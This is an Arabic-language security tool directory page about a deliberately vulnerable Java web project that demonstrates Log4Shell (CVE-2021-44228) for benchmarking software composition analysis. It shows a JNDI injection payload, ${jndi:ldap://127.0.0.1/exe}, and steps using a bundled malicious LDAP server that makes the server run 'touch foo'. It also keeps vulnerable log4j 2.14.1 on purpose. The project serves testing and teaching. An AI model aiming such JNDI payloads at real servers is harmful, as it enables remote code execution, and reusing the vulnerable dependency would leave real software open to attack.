Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
l4j-tp1 — مشروع ويب jee مع ثغرة log4shell (CVE-2021-44228) | Kitploit
أدوات/GitHubGitHub/scabench/l4j-tp1
تحليل الثغرات الأمنيةالاستغلالأمن الويبأمن سلسلة التوريدالتعلم والتعليممختبرات وتدريب عملي
GitHubscabench/l4j-tp1

l4j-tp1

مشروع ويب jee مع ثغرة log4shell (CVE-2021-44228)

عرض المستودع
5منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4shell إيجابي حقيقي

هذا مشروع ويب بسيط يحتوي على ثغرة log4shell. يحدد المشروع خدمة get بسيطة scabench.HelloWorldService تعيد سلسلة نصية عادية hello world. الخدمة لا تتوقع معاملات، وإذا تم العثور على معاملات، يتم تسجيل خطأ.

الاعتماد الضعيف هو org.apache.logging.log4j:log4j-core:2.14.1، الثغرة هي CVE-2021-44228.

إظهار الثغرة باستخدام اختبار

يتطلب ذلك نظام unix أو macos. من السهل نقل هذا المشروع إلى windows.

يتم توفير اختبار وحدة لإظهار الثغرة. يتطلب الاختبار خادم ldap يوفر كودًا ضعيفًا، ويتم توفير الملف التنفيذي المقابل من قبل المشروع، وهو معرف في مشروع منفصل https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept استنادًا إلى https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. ستتعامل تركيب الاختبار مع بدء تشغيل خادم ldap وإيقافه.

سينشئ الاختبار ملفًا foo استنادًا إلى أمر مشفر مضمن في كود خادم ldap الذي يتصل به log4j (touch foo). يمكن للمهاجم التحكم في هذا الخادم.

لتشغيل الاختبار، قم ببناء المشروع باستخدام .

mvn test

إظهار الثغرة عن طريق تشغيل التطبيق

  1. ابدأ خادم الويب المضمن: mvn jetty:run
  2. ابدأ خادم ldap المضمن: java -jar dodgy-ldap-server.jar (سيقوم الكود الضعيف بتنزيل كود Java من هذا الخادم)
  3. وجه المتصفح إلى http://localhost:8080/، يحتوي هذا الموقع على نموذج مملوء مسبقًا بحمولة خبيثة ${jndi:ldap://127.0.0.1/exe}
  4. أرسل هذا النموذج
  5. سينشئ هذا ملفًا foo على الخادم

تشغيل تحليلات تركيب البرمجيات

هناك العديد من نصوص sh لتشغيل تحليلات مختلفة، يمكن العثور على تقارير النتائج في scan-results.

إنشاء SBOM

يحتوي pom.xml على إضافة لإنشاء SBOM بتنسيق CycloneDX. للقيام بذلك، قم بتشغيل mvn cyclonedx:makePackageBom، يمكن العثور على SBOM في target/ بتنسيق json و xml.

تنزيل الأداة